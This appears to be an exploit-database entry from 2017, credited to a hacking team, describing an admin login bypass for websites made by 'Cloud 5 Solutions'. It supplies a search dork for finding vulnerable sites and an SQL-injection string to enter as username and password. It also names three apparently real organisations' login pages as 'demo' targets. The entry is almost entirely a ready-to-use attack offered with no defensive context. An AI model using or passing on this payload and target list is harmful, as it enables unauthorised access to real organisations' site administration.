id: 26688
date: 01/15/2017
title: Cloud 5 Solutions Admin Panel Bypass Vulnerability
author: jupa
cves: 

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title : Cloud 5 Solutions Admin Panel Bypass
[+] Dork : intext:"Web Design and Maintenance by Cloud 5 Solutions"
[+] Author : Jupa
[+] Team: Tunisian_Hackers
[+] Tested on : Windows 7/Firefox
[+]
[+] Admin Panel : http://www.website/admin/login.php
[+]
[+] User : '=' 'OR'
[+] Pass : '=' 'OR'
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Tutorial: https://www.youtube.com/watch?v=IW9vuYSqWuQ&feature=youtu.be
[+]
[+] Demo :
[+] http://williamstownba.org/admin/login.php
[+] http://www.wmstwp.org/admin/login.php
[+] http://www.jeffersontownshippa.org/admin/login.php
[+]
[+] Team: Tunisian_Hackers
[+] " fb/theonefayez "
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

#  0day.today [2023-03-25]  #